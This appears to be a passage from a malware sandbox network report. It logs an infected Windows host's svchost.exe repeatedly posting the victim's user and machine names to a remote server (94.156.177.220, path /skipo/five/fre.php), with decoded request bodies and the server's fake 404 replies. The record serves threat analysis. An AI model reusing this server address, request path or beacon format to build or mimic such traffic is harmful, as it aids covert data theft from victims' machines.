Oct 27, 2024 08:51:46.189174891 CET	50056	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:46.194513083 CET	80	50056	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:47.142678976 CET	80	50056	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:47.142826080 CET	50056	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:47.148641109 CET	80	50056	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:47.148720980 CET	50056	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:47.618333101 CET	50057	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:47.623764038 CET	80	50057	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:47.623862028 CET	50057	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:47.631727934 CET	50057	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:47.637084961 CET	80	50057	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:47.637134075 CET	50057	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:47.642581940 CET	80	50057	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:48.595319986 CET	80	50057	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:48.595469952 CET	50057	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:48.601144075 CET	80	50057	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:48.601208925 CET	50057	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:48.759021044 CET	50058	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:48.764492035 CET	80	50058	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:48.764599085 CET	50058	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:48.766890049 CET	50058	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:48.773375034 CET	80	50058	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:48.773539066 CET	50058	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:48.779994011 CET	80	50058	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:49.778708935 CET	80	50058	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:49.779117107 CET	50058	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:49.784943104 CET	80	50058	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:49.785043001 CET	50058	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:49.958245993 CET	50059	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:49.963663101 CET	80	50059	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:49.963745117 CET	50059	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:49.965749979 CET	50059	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:49.971055031 CET	80	50059	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:49.971106052 CET	50059	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:49.976474047 CET	80	50059	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:50.937827110 CET	80	50059	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:50.937948942 CET	50059	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:50.943802118 CET	80	50059	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:50.943870068 CET	50059	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:51.096438885 CET	50060	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:51.101924896 CET	80	50060	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:51.102025986 CET	50060	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:51.105014086 CET	50060	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:51.110352993 CET	80	50060	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:51.110434055 CET	50060	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:51.115755081 CET	80	50060	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:52.084106922 CET	80	50060	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:52.086390018 CET	50060	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:52.092365980 CET	80	50060	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:52.093909025 CET	50060	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:52.262897015 CET	50061	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:52.269298077 CET	80	50061	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:52.269403934 CET	50061	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:52.272306919 CET	50061	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:52.277692080 CET	80	50061	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:52.277797937 CET	50061	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:52.283121109 CET	80	50061	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:53.279484987 CET	80	50061	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:53.279747009 CET	50061	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:53.285458088 CET	80	50061	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:53.285562038 CET	50061	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:53.435230017 CET	50062	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:53.440721989 CET	80	50062	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:53.440836906 CET	50062	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:53.442929029 CET	50062	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:53.448267937 CET	80	50062	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:53.448342085 CET	50062	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:53.453761101 CET	80	50062	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:54.429394007 CET	80	50062	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:54.432804108 CET	50062	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:54.438687086 CET	80	50062	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:54.438759089 CET	50062	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:54.644448042 CET	50063	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:54.650222063 CET	80	50063	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:54.650340080 CET	50063	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:54.652326107 CET	50063	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:54.657704115 CET	80	50063	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:54.657778978 CET	50063	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:54.663212061 CET	80	50063	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:55.643529892 CET	80	50063	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:55.643651962 CET	50063	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:55.649812937 CET	80	50063	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:55.649883032 CET	50063	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:55.804423094 CET	50064	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:55.810044050 CET	80	50064	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:55.810163975 CET	50064	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:55.812553883 CET	50064	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:55.817900896 CET	80	50064	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:55.818063021 CET	50064	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:55.823399067 CET	80	50064	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:56.780179024 CET	80	50064	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:56.780487061 CET	50064	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:56.786328077 CET	80	50064	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:56.786398888 CET	50064	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:57.245167017 CET	50065	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:57.250571012 CET	80	50065	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:57.250678062 CET	50065	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:57.254256964 CET	50065	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:57.259829998 CET	80	50065	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:57.259902000 CET	50065	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:57.265193939 CET	80	50065	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:58.233050108 CET	80	50065	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:58.233351946 CET	50065	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:58.240106106 CET	80	50065	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:58.240194082 CET	50065	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:58.401712894 CET	50066	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:58.407202959 CET	80	50066	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:58.407417059 CET	50066	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:58.410533905 CET	50066	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:58.415945053 CET	80	50066	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:58.416004896 CET	50066	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:58.421392918 CET	80	50066	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:59.409586906 CET	80	50066	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:59.409761906 CET	50066	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:59.415458918 CET	80	50066	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:59.415551901 CET	50066	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:59.570988894 CET	50067	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:59.576488972 CET	80	50067	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:59.576596975 CET	50067	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:59.578775883 CET	50067	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:59.584103107 CET	80	50067	94.156.177.220	192.168.2.5
Oct 27, 2024 08:51:59.584177017 CET	50067	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:51:59.589482069 CET	80	50067	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:00.558684111 CET	80	50067	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:00.558856010 CET	50067	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:00.565164089 CET	80	50067	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:00.565263033 CET	50067	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:00.730592966 CET	50068	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:00.736219883 CET	80	50068	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:00.736325026 CET	50068	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:00.738553047 CET	50068	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:00.744020939 CET	80	50068	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:00.744111061 CET	50068	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:00.749495983 CET	80	50068	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:01.715008020 CET	80	50068	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:01.715148926 CET	50068	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:01.720953941 CET	80	50068	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:01.721064091 CET	50068	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:02.133977890 CET	50069	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:02.139573097 CET	80	50069	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:02.139751911 CET	50069	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:02.142282009 CET	50069	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:02.147618055 CET	80	50069	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:02.147703886 CET	50069	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:02.153059959 CET	80	50069	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:03.097754002 CET	80	50069	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:03.098066092 CET	50069	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:03.103857040 CET	80	50069	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:03.103970051 CET	50069	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:03.259260893 CET	50070	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:03.264861107 CET	80	50070	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:03.264995098 CET	50070	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:03.267963886 CET	50070	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:03.273370981 CET	80	50070	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:03.273449898 CET	50070	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:03.278824091 CET	80	50070	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:04.229466915 CET	80	50070	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:04.229607105 CET	50070	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:04.235518932 CET	80	50070	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:04.235608101 CET	50070	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:05.211378098 CET	50071	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:05.216900110 CET	80	50071	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:05.217000961 CET	50071	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:05.219342947 CET	50071	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:05.224644899 CET	80	50071	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:05.224736929 CET	50071	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:05.230036974 CET	80	50071	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:06.200335979 CET	80	50071	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:06.200494051 CET	50071	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:06.207503080 CET	80	50071	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:06.207622051 CET	50071	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:06.358438015 CET	50072	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:06.364049911 CET	80	50072	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:06.364128113 CET	50072	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:06.366476059 CET	50072	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:06.371871948 CET	80	50072	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:06.371984005 CET	50072	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:06.377408028 CET	80	50072	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:07.341907024 CET	80	50072	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:07.344016075 CET	50072	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:07.349781036 CET	80	50072	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:07.351923943 CET	50072	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:07.598510981 CET	50073	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:07.604110956 CET	80	50073	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:07.604213953 CET	50073	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:07.606265068 CET	50073	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:07.611696959 CET	80	50073	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:07.611756086 CET	50073	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:07.617146969 CET	80	50073	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:08.580118895 CET	80	50073	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:08.623892069 CET	50073	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:52:08.749717951 CET	80	50073	94.156.177.220	192.168.2.5
Oct 27, 2024 08:52:08.749778032 CET	50073	80	192.168.2.5	94.156.177.220

HTTP Request Dependency Graph

94.156.177.220

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:12.868511915 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 180 Connection: close
Oct 27, 2024 08:50:12.874031067 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons621365ALFONS-PCk0FDD42EE188E931437F4FBE2CTPvma
Oct 27, 2024 08:50:13.840903044 CET	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:14.048495054 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 180 Connection: close
Oct 27, 2024 08:50:14.054014921 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons621365ALFONS-PC+0FDD42EE188E931437F4FBE2CjRgey
Oct 27, 2024 08:50:15.023091078 CET	228	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 15 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:15.093585968 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:15.099443913 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:16.056801081 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:16.339914083 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:16.345385075 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:17.328974962 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:17.476193905 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:17.481650114 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:18.456502914 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49711	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:18.615168095 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:18.620574951 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:19.575421095 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49714	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:19.728496075 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:19.733946085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:20.689227104 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:20.857235909 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:20.863635063 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:21.807653904 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49720	94.156.177.220	80	5648	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 08:50:21.973035097 CET	245	OUT	POST /skipo/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.220 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: E1DD60CA Content-Length: 153 Connection: close
Oct 27, 2024 08:50:21.978873014 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 36 00 32 00 31 00 33 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons621365ALFONS-PC0FDD42EE188E931437F4FBE2C
Oct 27, 2024 08:50:22.948069096 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sun, 27 Oct 2024 07:50:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
